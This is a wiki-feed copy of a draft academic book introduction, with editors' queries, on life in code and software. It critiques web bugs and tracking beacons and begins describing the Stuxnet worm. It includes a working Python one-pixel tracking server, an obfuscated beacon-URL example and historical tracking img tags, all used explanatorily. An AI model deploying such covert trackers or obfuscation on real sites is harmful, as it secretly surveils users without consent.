Wolf, G. (2010) The Quantified Self, TED, accessed 15/03/2012, http://www.youtube.com/watch?v=OrAo8oBBFIo ''(c) 2010 TED CONFERENCES, LLC''&lt;/div&gt;</summary>
		<author><name>Garyhall</name></author>
	</entry>
	<entry>
		<id>https://livingbooksaboutlife.org/wiki/index.php?title=Life_in_Code_and_Software/Introduction&amp;diff=4711</id>
		<title>Life in Code and Software/Introduction</title>
		<link rel="alternate" type="text/html" href="https://livingbooksaboutlife.org/wiki/index.php?title=Life_in_Code_and_Software/Introduction&amp;diff=4711"/>
		<updated>2012-04-18T14:42:43Z</updated>

		<summary type="html">&lt;p&gt;Garyhall: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[http://www.livingbooksaboutlife.org/books/Life_in_Code_and_Software Back to the book] &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
This book explores the relationship between living, code and software. Technologies of code and software increasingly make up an important part of our urban environment. Indeed, their reach stretches to even quite remote areas of the world. ''Life in Code and Software'' introduces and explores the way in which code and software are becoming the conditions of possibility for human living, crucially forming a computational ecology that we inhabit. As such, we need to take account of this new computational environment and think about how we live today in a highly mediated, code-based world. [Eds: Is there a slippage here from a situation where code and software are 'important', to one in which they form the actual basis of our world, constituting the possibility of human life? Does something need to be said here about the extent to which code and software can be privileged in this respect? For example, why can they be said to constitute the conditions for human living over and above any of the other possible candidates for this role: air, the economy, evolution, the environment, satellites and so on?]&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Certainly, computer code and software are not merely mechanisms; they represent an extremely rich form of media. They differ from previous instantiations of media in that they are highly processual. They can also have agency delegated to them, which they can then prescribe back onto other actors, although it remains within the purview of humans to seek to understand this delegated agency. As Kitchin argues:&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;across a diverse set of everyday tasks, domestic chores, work, shopping, travelling, communicating, governing, and policing, software makes a difference to how social, spatial, and economic life takes place. Such is software's capacities and growing pervasiveness that some analysts predict that we are entering a new phase of ‘everyware’ (Greenfield, 2006); that is, computational power will be distributed and available at any point on the planet. (Kitchin, 2011: 945)&amp;lt;br&amp;gt; &amp;lt;/blockquote&amp;gt;&amp;lt;blockquote&amp;gt;&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; This deeply interactive characteristic of code and software makes computational media highly plastic for use in everyday life, and as such it has steadily penetrated more and more of the lifeworld. This has created, and continues to create, specific tensions in relation to old media forms (consider, for example, the remediation of print newspapers into software-driven online platforms), as well as problems for managing and spectacularising the relations of the public to the entertainment industry and politics. Such tensions relate to the interests of the previous century’s critical theorists, particularly their concern with the liquidation of individuality and the homogenization of culture. Nonetheless, there is also held to be a radical, if not revolutionary, kernel within the softwarization project, a result of the relative affordance code/software appears to provide for autonomous individuals within networks of association to share information and communicate. Indeed, as Deuze ''et al.'' have argued:&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;Considering the current opportunity a media life gives people to create multiple versions of themselves and others, and to endlessly redact themselves (as someone does with his/her profile on an online dating site in order to produce better matches), we now have entered a time where… we can in fact see ourselves live, become cognizant about how our lifeworld is 'a world of artifice, of bending, adapting, of fiction, vanity, a world that has meaning and value only for the man who is its deviser' [Pirandello 1990,&amp;amp;nbsp;39]. But this is not an atomized, fragmented, and depressing world, or it does not have to be such a world. (Deuze, Blank, and Speers, 2012)&amp;lt;br&amp;gt; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; I want to understand the ecology in computational ecology here as a broad concept related to the environmental habitus of both human and non-human actors. My aim in doing so is to explore changes that are made possible by the installation of code/software via computational devices, streams, clouds, or networks. This is what Mitcham calls a ‘new ecology of artifice’ (1998: 43). The proliferation of contrivances that are computationally based is truly breathtaking – each year we are provided with fresh statistics that demonstrate just how profound the new computational world is. [Eds: should some examples of such statistics be provided?] These computationally based devices, of course, are not static, nor are they mute, and their interconnections, communications, operation, effects and usage remain to be properly studied. It is a task that is made all the more difficult: both by the staggering rate of change, thanks to the underlying hardware technologies, which are becoming ever smaller, more compact, more powerful and less power-hungry; and by the increasing complexity, power, range and intelligence of the software that powers these devices. &lt;br /&gt;
&lt;br /&gt;
They [Eds: what does this 'they' refer to? Can it be clarified?] also enable the assemblage of the new social ontologies and the corresponding social epistemologies that we have increasingly come to take for granted in computational society, including Wikipedia, Facebook, and Twitter. The extent to which computational devices, and the computational principles on which they are based and from which they draw their power, have permeated the way we use and develop knowledges in everyday life would be simply breathtaking [Eds: is this not repeating the 'breathtaking' claim of the previous paragraph?], had we not already discounted and backgrounded their importance. The ability to call up information instantly from a mobile device, combine it with others, subject it to debate and critique through real-time social networks, and then edit, post and distribute it worldwide would be incredible if it hadn’t become so mundane. &lt;br /&gt;
&lt;br /&gt;
Today it should hardly come as a surprise that code/software lies as a mediator between ourselves and our corporeal experiences [Eds: Above the claim was made that code/software are the conditions of possibility of human life. How, then, can they mediate between us and our experiences if they are what makes 'us' possible? Do they constitute us and our world; do they mediate between us and the world; or do they do both? Does all this need clarifying?], disconnecting the physical world from a direct coupling with our physicality, whilst managing a looser softwarized transmission system. Called ‘fly-by-wire’ in aircraft design, this is in reality the condition of the computational environment we increasingly experience, and one I elsewhere term ''computationality'' (Berry, 2011). This is a highly mediated existence, and one that has been a growing feature of the (post)modern world. Whilst many objects remain firmly material and within our grasp, it is easy to see how a more softwarized simulacrum lies just beyond the horizon. Not that software isn’t material, of course. Certainly, it is embedded in physical objects and the physical environment and requires a material carrier to function at all. Nonetheless, the materiality of software is without a doubt ''differently'' material, more ''tenuously'' material, almost less ''materially material''. [Eds: less material than what? Does this need to be explained?] This is partly, it has to be said, due to software’s increasing tendency to hide its depths behind rectangles of glass which yield only to certain prescribed forms of touch-based interface. Here I am thinking of physical keyboards and trackpads, as much as of haptic touch interfaces, like those found in the iPad and other tablet computers. Another way of putting this, as N. Katherine Hayles (2004) has accurately observed, is that print is flat and code is deep. [Eds: At least one of those contained in your book here, F. Frabetti, creates problems for this idea of Hayles' and its too simplistic understanding of code, print, and materiality. Is this something that should be referenced and commented upon?]&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
== '''Web Bugs, Beacons, and Trackers'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Some examples will help to demonstrate how this code-based world is increasingly being spun around us. Firstly, we might consider the growing phenomenon of what are called ‘web bugs’ (also known as ‘web beacons’); that is, computer programming code that is embedded in seemingly benign surfaces, but which is actively and covertly collecting data and information about us.[1] As Madrigal explains: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;This morning, if you opened your browser and went to NYTimes.com, an amazing thing happened in the milliseconds between your click and when the news about North Korea and James Murdoch appeared on your screen. Data from this single visit was sent to 10 different companies, including Microsoft and Google subsidiaries, a gaggle of traffic-logging sites, and other, smaller ad firms. Nearly instantaneously, these companies can log your visit, place ads tailored for your eyes specifically, and add to the ever-growing online file about you… the list of companies that tracked my movements on the Internet in one recent 36-hour period of standard web surfing: Acerno. Adara Media. Adblade. Adbrite. ADC Onion. Adchemy. ADiFY. AdMeld. Adtech. Aggregate Knowledge. AlmondNet. Aperture. AppNexus. Atlas. Audience Science… And that's just the As. My complete list includes 105 companies, and there are dozens more than that in existence. (Madrigal, 2012).&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; Web bugs are automated data collection agents that are secretly included in the web pages that we browse. Often held within a tiny one-pixel frame or image, which is therefore far too small for the naked eye to see, they execute code to secrete cookies onto your computer so that they can track user behaviour, but also [Eds: use 'and' instead of 'but also' as these acts are not that different?] send various information about the user back to their servers. &lt;br /&gt;
&lt;br /&gt;
Originally conceived as ‘HTTP state management mechanisms’ in the early 1990s, these data storage processes were designed to enable webpages and sites to store the current collection of data about a user, or what is called ‘State’ in computer science. Known as ‘web bugs for web 1.0’ (Dobias, 2010: 245), they were aimed at allowing website designers to implement some element of memory about a user, such as a current shopping basket, preferences, or username. It was a small step for companies to see the potential of monitoring user behaviour by leaving tracking information about browsing, purchasing and clicking behaviour through the use of these early ‘cookies’.[2] The ability of algorithms to track behaviour and collect data and information about users raises important privacy concerns, but it also facilitates the rise of so-called behavioural marketing and nudges (for a behaviourist approach see Eyal, 2012). These technologies have become much more sophisticated in the light of Web 2.0 technologies and developments in hardware and software: in effect, web bugs for web 2.0 (Dobias, 2010: 245). &lt;br /&gt;
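&lt;br /&gt;
To make this mechanism concrete, the following is a minimal sketch in Python of what the server side of a one-pixel web bug might look like. It is illustrative only – the handler name, port and logging are my own invention rather than any actual tracker’s code – but it shows how the Set-Cookie header implements the ‘state management’ described above: the tiny GIF is the (invisible) surface, while the identifier persisted in the cookie is what allows separate visits to be linked together. &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
# A hypothetical sketch of a 1x1-pixel web bug server, not any vendor's code.&lt;br /&gt;
# It serves a tiny GIF and uses Set-Cookie to persist a visitor identifier.&lt;br /&gt;
import base64, uuid&lt;br /&gt;
from http.server import BaseHTTPRequestHandler, HTTPServer&lt;br /&gt;
&lt;br /&gt;
# The standard 1x1 transparent GIF, 42 bytes.&lt;br /&gt;
PIXEL = base64.b64decode('R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7')&lt;br /&gt;
&lt;br /&gt;
class TrackingPixel(BaseHTTPRequestHandler):&lt;br /&gt;
    def do_GET(self):&lt;br /&gt;
        cookie = self.headers.get('Cookie', '')&lt;br /&gt;
        if 'uid=' in cookie:&lt;br /&gt;
            uid = cookie.split('uid=')[1].split(';')[0]  # returning visitor&lt;br /&gt;
        else:&lt;br /&gt;
            uid = uuid.uuid4().hex  # first visit: mint a new identifier&lt;br /&gt;
        # 'Log' the visit: who, from which embedding page, with which browser.&lt;br /&gt;
        print(uid, self.headers.get('Referer'), self.headers.get('User-Agent'))&lt;br /&gt;
        self.send_response(200)&lt;br /&gt;
        self.send_header('Content-Type', 'image/gif')&lt;br /&gt;
        self.send_header('Set-Cookie', 'uid=%s; Max-Age=31536000' % uid)&lt;br /&gt;
        self.end_headers()&lt;br /&gt;
        self.wfile.write(PIXEL)&lt;br /&gt;
&lt;br /&gt;
HTTPServer(('', 8000), TrackingPixel).serve_forever()&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;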
&lt;br /&gt;
Fortunately, we are seeing the creation of a number of useful software projects to allow us to track the trackers: Collusion, Foxtracks and Ghostery, for example.[3] If we look at the Ghostery log for the [http://chartbeat.com/ ChartBeat company] it is described as: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;Provid[ing] real-time analytics to web sites and blogs. The interface tracks visitors, load times, and referring sites on a minute-by-minute basis. This allows real-time engagement with users giving publishers an opportunity to respond to social media events as they happen. ChartBeat also supports mobile technology through APIs. (Ghostery, 2012b)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Web bugs perform these analytics by running code in the browser without the knowledge of the user; should this code be observed, it looks extremely complicated.[4] Here are two early web bugs (web 1.0) collected by the Electronic Frontier Foundation (EFF) (1999): &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;&lt;br /&gt;
*&amp;lt;pre&amp;gt;&amp;amp;lt;img src=&amp;quot;http://ad.doubleclick.net/ad/pixel.quicken/NEW&amp;quot; width=1 height=1 border=0&amp;amp;gt;&amp;lt;/pre&amp;gt; &lt;br /&gt;
*&amp;lt;pre&amp;gt;&amp;amp;lt;IMG WIDTH=1 HEIGHT=1 border=0 SRC=&amp;quot;http://media.preferences.com/ping?ML_SD=IntuitTE_Intuit_1x1_RunOfSite_Any&amp;amp;amp;db_afcr=4B31-C2FB-10E2C&amp;amp;amp;event=reghome&amp;amp;amp;group=register&amp;amp;amp;time=1999.10.27.20.56.37&amp;quot;&amp;amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Later web bugs (web 2.0) are not included here due to the complexity and length of the code (but see the 3rd-party elements, or ‘3pes’, at http://www.knowyourelements.com/ ).[5] It is noticeable that this code is extremely opaque and difficult to understand, even for experienced computer programmers. Indeed, one suspects an element of obfuscation, a programming technique to reduce the readability of the code in order to shield the company from observation. So far, in checking a number of web bugs on a variety of websites, I have been unable to find one that supplies any commentary on what exactly the code is doing, beyond a short privacy policy statement. Again Ghostery (2012b) usefully supplies us with some general information on the web bug, such as the fact that it has been found on over 100,000 websites across the Internet, and that the data collected is 'anonymous (browser type), pseudonymous (IP address)' and is not shared with third parties; no information is given, however, on data retention policies. As of 2nd March, 2012, Ghostery reported that it was tracking 829 different web bugs across the Internet. This is a relatively unregulated market in user behaviour tracking and data collection, which currently has a number of self-regulatory bodies, such as the Network Advertising Initiative (NAI). As Madrigal reports: 'In essence, [the NAI] argued that users do not have the right to *not* be tracked. &amp;quot;We've long recognized that consumers should be provided a choice about whether data about their likely interests can be used to make their ads more relevant,&amp;quot; [they] wrote. &amp;quot;But the NAI code also recognizes that companies sometimes need to continue to collect data for operational reasons that are separate from ad targeting based on a user's online behavior.&amp;quot;… Companies &amp;quot;need to continue to collect data,&amp;quot; but that contrasts directly with users desire &amp;quot;not to be tracked.&amp;quot;' (Madrigal, 2012). [Eds: please check that the single and double quotation marks here are correct]&amp;lt;br&amp;gt; &lt;br /&gt;
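&lt;br /&gt;
As an illustration of what such obfuscation involves, the following hypothetical fragment (in Python for readability; real web bugs are JavaScript, and the names and URL here are invented) shows the same beacon-building logic twice: first as a programmer would write it, and then after the mechanical renaming and flattening that makes shipped tracker code resistant to casual reading. &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
def build_beacon_url(site_id, visitor_id, event):&lt;br /&gt;
    # Readable version: the intent is obvious from the names alone.&lt;br /&gt;
    return 'http://stats.example.com/ping?site=%s;uid=%s;ev=%s' % (&lt;br /&gt;
        site_id, visitor_id, event)&lt;br /&gt;
&lt;br /&gt;
def _0x3f(a, b, c):&lt;br /&gt;
    # Obfuscated but behaviourally identical version (for string arguments).&lt;br /&gt;
    _ = ['http://stats.example.com/ping?site=', ';uid=', ';ev=']&lt;br /&gt;
    return _[0] + a + _[1] + b + _[2] + c&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;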
&lt;br /&gt;
&amp;lt;br&amp;gt; These web bugs, beacons, pixels, and tags, as they are variously called, form part of the dark-net surveillance network that users rarely see, even though it is profoundly changing their experience of the internet in real-time by attempting to second-guess, tempt, direct and nudge behaviour in particular directions. Ghostery ranked the web bugs in 2010 and identified the following as the most frequently encountered (above average): Revenue Science (250x), OpenX (254x), AddThis (523.6x), Facebook Connect (529.8x), Omniture (605.7x), Comscore Beacon (659.5x), DoubleClick (924.4x), QuantCast (1042x), Google Adsense (1452x), Google Analytics (3904.5x) (Ghostery, 2011). As can be seen from the relative frequency of encounter, Google is clearly the biggest player by a long distance in the area of user statistics collection. This data is important because, as JP Morgan's Imran Khan explained, a unique visitor generates $189 at [http://www.businessinsider.com/blackboard/amazon Amazon] (e-commerce) and $24 at [http://www.businessinsider.com/blackboard/google Google] (search), and although Facebook (social networking) is only generating $4 per user, this is a rapidly growing number (Yarrow, 2011). Keeping and holding these visitors, through real-time analytics, customer history, behavioural targeting, etc. is increasingly becoming extremely profitable. Ghostery (2010) has performed a useful analysis of their web bug database that attempts to categorise the web bugs found into 16 different types, which I have re-categorised into four main types: (1) Advertiser/Marketing Services, (2) Analysis/Research Services, (3) Management Platforms, (4) Verification/Privacy Services: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
1. &amp;amp;nbsp; &amp;amp;nbsp; &amp;amp;nbsp; '''Advertiser/Marketing Services''': &lt;br /&gt;
&lt;br /&gt;
*a.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Advertiser: A company sponsoring advertisement and ultimately responsible for the message delivered to the consumer. Example: [http://www.att.com/ AT&amp;amp;amp;T] &lt;br /&gt;
*b.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Exchange: A provider of marketplace connecting advertisers to ad networks and data aggregators (online and off), often facilitating multiple connections and bidding processes. Example: [http://www.rightmedia.com/ Right Media]&amp;amp;nbsp; &amp;amp;nbsp; &lt;br /&gt;
*c.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Network: A broker and often technology provider connecting advertisers and publishers (web site operators). Example: [http://www.burstmedia.com/ Burst Media]&amp;lt;br&amp;gt; &lt;br /&gt;
*d.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Publisher: Website operator who displays ads for advertiser(s) in various types of campaigns. Example: [http://www.nytimes.com/ The New York Times]&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
2. &amp;amp;nbsp; &amp;amp;nbsp; &amp;amp;nbsp; '''Analysis/Research Services''': &lt;br /&gt;
&lt;br /&gt;
*a.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Online Data Aggregator: Collects data from online publishers and provides it to advertisers either directly or via exchange. Example: [http://www.bluekai.com/ BlueKai] &lt;br /&gt;
*b.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Offline Data Aggregator: Collects data from a range of offline sources and provides data to advertisers directly or via exchange. Example: [http://www.experian.com/ Experian] &lt;br /&gt;
*c.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Optimizer: Provider of analytics technology and services for ROI assessment and content optimization purposes. Example: [http://www.roilabs.com/ ROILabs] &lt;br /&gt;
*d.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Research: Collects data for market research purposes where no ads are served through this data. Example: [http://www.safecount.net/ Safecount] &lt;br /&gt;
*e.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Analytics Provider: Provider of cross-platform statistical analysis to understand market effectiveness and audience segmentation. Example: [http://www.google.com/analytics/ Google Analytics] &lt;br /&gt;
*f.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Retargeter: Providers of technologies that allow publishers to identify their visitor when they place ads on third party sites. Example: [http://www.fetchback.com/ Fetchback]&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
3. &amp;amp;nbsp; &amp;amp;nbsp; &amp;amp;nbsp; '''Management Platforms''': &lt;br /&gt;
&lt;br /&gt;
*a.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Demand-Side Platform: A technology provider that allows marketers to buy inventory across multiple platforms or exchanges. DSPs often layer in custom optimization, audience targeting, real-time bidding and other services. Example: [http://www.invitemedia.com/ Invite Media]&amp;lt;br&amp;gt; &lt;br /&gt;
*b.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Supply-Side Platform: A technology provider that allows publishers to access advertiser demand across multiple platforms or exchanges.&amp;amp;nbsp; SSPs often layer in custom yield optimization, audience creation, real-time bidding and other services. Example: [http://www.admeld.com/ AdMeld]&amp;lt;br&amp;gt; &lt;br /&gt;
*c.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Ad Server: Technology that delivers and tracks advertisements independently of the web site where the ad is being displayed. Example: [http://www.doubleclick.com/ DoubleClick DART]&amp;lt;br&amp;gt; &lt;br /&gt;
*d.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Agency: Provider of creative and buying services (both audience and data) for advertisers. Example: [http://www.mediacom.com/en/home.aspx MediaCom]&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
4. &amp;amp;nbsp; &amp;amp;nbsp; &amp;amp;nbsp; '''Verification/Privacy Services''': &lt;br /&gt;
&lt;br /&gt;
*a.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Ad Verification: Certifies or classifies webpages in an effort to prevent advertisers’ campaigns from running on unsavory or blocked content, and/or protects advertisers from having other companies run their ads incorrectly. &amp;amp;nbsp;Example: [http://www.clickforensics.com/ ClickForensics] &lt;br /&gt;
*b.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Online Privacy: Technology providers that deliver information and transparency to consumers on how 3rd party companies gather and use their data. Example: [http://www.betteradvertising.com/ Better Advertising]&amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &amp;lt;br&amp;gt; [[Image:LUMAadvertising.jpg|left|500x450px|Image 1: Display Advertising Technology Landscape (Luma, 2010)]] &amp;lt;br&amp;gt; ''Image 1: Display Advertising Technology Landscape (Luma, 2010)''&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &amp;lt;br&amp;gt; &amp;lt;br&amp;gt; Ghostery gives a useful explanation of how these companies interoperate to perform a variety of services for advertising and marketing clients: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;A company like [http://www.turn.com/ Turn Media] is a technology provider that allows marketers to buy inventory across multiple platforms or exchanges, or a Demand-Side Platform. They provide services for marketers and agencies to centrally manage buying, planning, targeting, and optimizing media opportunities. Reasonably speaking, however, you could also technically classify them as an Optimizer because this process is included under the umbrella of the platform. Turn [Media] is deeply data driven and partners with multiple data providers including [http://www.bluekai.com/ BlueKai], [http://www.targusinfo.com/ TargusInfo], [http://www.exelate.com/new/index.html eXelate], and others (Ghostery, 2010). &amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; Of course, one element missing from this typology is that of surveillance, and indeed it is no surprise that web bugs form part of the tracking technologies used by companies to monitor staff. For example, in 2006 Hewlett Packard used web bugs from [http://readnotify.com/ readnotify.com] to trace insider leaks to the journalist Dawn Kawamoto, and later confirmed in testimony to a U.S. House of Representatives subcommittee that it was ‘still company practice to use e-mail bugs in certain cases’ (Evers, 2006; Fried, 2006). &lt;br /&gt;
&lt;br /&gt;
As can be seen, this is an extremely textured environment that currently offers little in terms of diagnosis or even warnings to the user. The industry itself, which prefers the term “clear GIF” to web bug, is certainly keen to avoid regulation and keeps itself very much to itself in order to avoid attracting too much unwanted attention. Some of the current discussions over the direction of regulation on this issue have focused on the “do not track” flag, which would signal a user's opt-out preference within an HTTP header. Unfortunately, very few companies respect the &amp;quot;do not track&amp;quot; header and there is currently no legal requirement that they do so in the US, or elsewhere (W3C, 2012). One can see in this context the current debate over the EU ePrivacy Directive, where the Article 29 Working Party (A29 WP) has stated that ‘voluntary plans drawn up by Europe's digital advertising industry representatives, the European Advertising Standards Alliance (EASA) and IAB Europe, do not meet the consent and information requirements of the recently revised ePrivacy Directive’ (Baker, 2012). [Eds: would this final point be better in a footnote?]&amp;amp;nbsp; &lt;br /&gt;
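&lt;br /&gt;
Technically, honouring the flag would be trivial, which is what makes the lack of compliance telling. The sketch below (hypothetical code, in Python) shows all that a compliant service would have to do: the browser sends a one-character HTTP header, DNT: 1, and the server simply declines to log the visit. &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
def handle_request(headers, log_visit):&lt;br /&gt;
    # 'headers' is a dict of HTTP request headers; 'log_visit' is whatever&lt;br /&gt;
    # tracking sink the service uses (both names are hypothetical).&lt;br /&gt;
    if headers.get('DNT') == '1':&lt;br /&gt;
        return  # the user has opted out of tracking; record nothing&lt;br /&gt;
    log_visit(headers.get('Referer'), headers.get('User-Agent'))&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;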
&lt;br /&gt;
Indicative, perhaps, of the direction of travel of these new web bugs is [http://www.persianstat.ir/ PersianStat], an Iranian web tracking and data analytics service which claims to keep 'an eye on 1091622 websites'; it shows that this new code ecology is not a purely Western phenomenon. With the greater use of computational networked devices in everyday life, from mobile phones to GPS systems, these tracking systems will only become more invasive and aggressive in collecting data from our everyday life and encounters. Indeed, it is unsurprising to find that Americans, for example, are not comfortable with the growth in use of these tracker technologies. Pew (2012) found: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;that 73 percent of&amp;amp;nbsp;Americans said they would 'not be okay' with&amp;amp;nbsp;being tracked (because it would be an invasion&amp;amp;nbsp;of privacy)… Only 23 percent said they'd be 'okay' with&amp;amp;nbsp;tracking (because it would lead to better and&amp;amp;nbsp;more personalized search results)…Despite all those high-percentage objections&amp;amp;nbsp;to the idea of being tracked, less than half of&amp;amp;nbsp;the people surveyed -- 38 percent -- said they&amp;amp;nbsp;knew of ways to control the data collected&amp;amp;nbsp;about them. (Garber, 2012; Pew, 2012).&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; This contradiction between the ability of these computational systems and surfaces to supply a commodity to the user, and the need to raise income through the harvesting of data which is in turn sold to advertisers and marketing companies, shows that this is an unstable situation. It also serves to demonstrate the extent to which users are just not aware of the subterranean depths of their computational devices and the ability of these general computing platforms to disconnect the user interface from the actual intentions or functioning of the device, whilst giving the impression to the user that they remain fully in control of the computer. As Garber observes, ‘underground network, surface illusion… How much do we actually want to know about this stuff? Do we truly want to understand the intricacies of data-collection and personalization and all the behind-the-screen work that creates the easy, breezy experience of search ... or would we, on some level, prefer that it remain as magic?’ (Garber, 2012). This issue is helpfully illustrated by the next case study, of the Stuxnet virus, which shows the extent to which the magic of software can conceal its true function. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
== '''Stuxnet'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Stuxnet[6] is a computer worm which experts now believe was aimed at the Iranian uranium-enrichment facility at Natanz, Iran.[7] The Stuxnet worm, a subclass of computer virus, copied itself repeatedly across computer systems until it found the host that met its ‘strike conditions’, that is, the location it was designed to attack, and activated its ‘digital warhead’, which may monitor, damage, or even destroy its target. The name, ‘Stuxnet,’ is ‘derived from some of the filename/strings in the malware - mrxcls.sys, mrxnet.sys’, the first part, 'stu', comes from the (.stub) file, mrxcls.sys; the second part, 'xnet', comes from mrxnet.sys (Kruszelnicki, 2011; mmpc2, 2010). Due to the sophistication of the programming involved, this worm is considered to have reached a new level in cyberwarfare. Stuxnet has been called the first 'weaponized' computer virus, and it would have required huge resources, like a test facility to model a nuclear plant, to create and launch it (Cherry, 2010). As Liam O Murchu, an operations manager for Symantec, explained: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;Unlike the millions of worms and viruses that turn up on the Internet every year, this one was not trying to steal passwords, identities or money. Stuxnet appeared to be crawling around the world, computer by computer, looking for some sort of industrial operation that was using a specific piece of equipment, a Siemens S7-300 programmable logic controller. (60 Minutes, 2012b).&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;The Stuxnet worm works by undertaking a very complex stealth infection and covers its tracks by recording data from the nuclear processing system which it then plays back to the operators to disguise that it is actually gently causing the centrifuges to fail. This is known as a ‘man-in-the-middle attack’ because it fakes industrial process control sensor signals so that an infected system does not exhibit abnormal behaviour and therefore does not raise an alarm. Again, cleverly, the faults it creates in the plant are likely to occur weeks after the act of sabotage, and in a targeted way, through the fatiguing of the motors – this looks like a standard failure rather than an attack. Indeed, Iran later confirmed that a number of its centrifuges had been affected by an attack (CBS News, 2010). A ‘senior Iranian intelligence official said an estimated 16,000 computers were infected by the Stuxnet virus’ (Associated Press, 2012). The Stuxnet worm is also interesting because it has built-in ''sunset code'' that causes the worm to erase itself after 24 June, 2012, and hence hide its tracks. As Zetter explains: &lt;br /&gt;
